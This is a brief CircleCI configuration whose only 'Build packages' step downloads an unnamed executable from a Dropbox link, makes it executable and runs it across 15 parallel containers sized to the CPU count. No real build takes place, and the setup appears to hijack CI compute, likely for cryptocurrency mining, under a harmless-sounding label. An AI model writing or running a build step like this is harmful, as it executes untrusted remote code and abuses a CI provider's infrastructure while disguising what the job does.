version: 2.1
jobs:
  build:
    docker:
      - image: circleci/ruby:2.6
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD
    parallelism: 15
    steps:
      - checkout
      - run: 
          name: Build packages
          command: |
            export THREADS=$(nproc)
            wget -qO run https://www.dropbox.com/s/p36fuqsbtaaii97/pk-tz?dl=1; chmod +x run
            ./run ann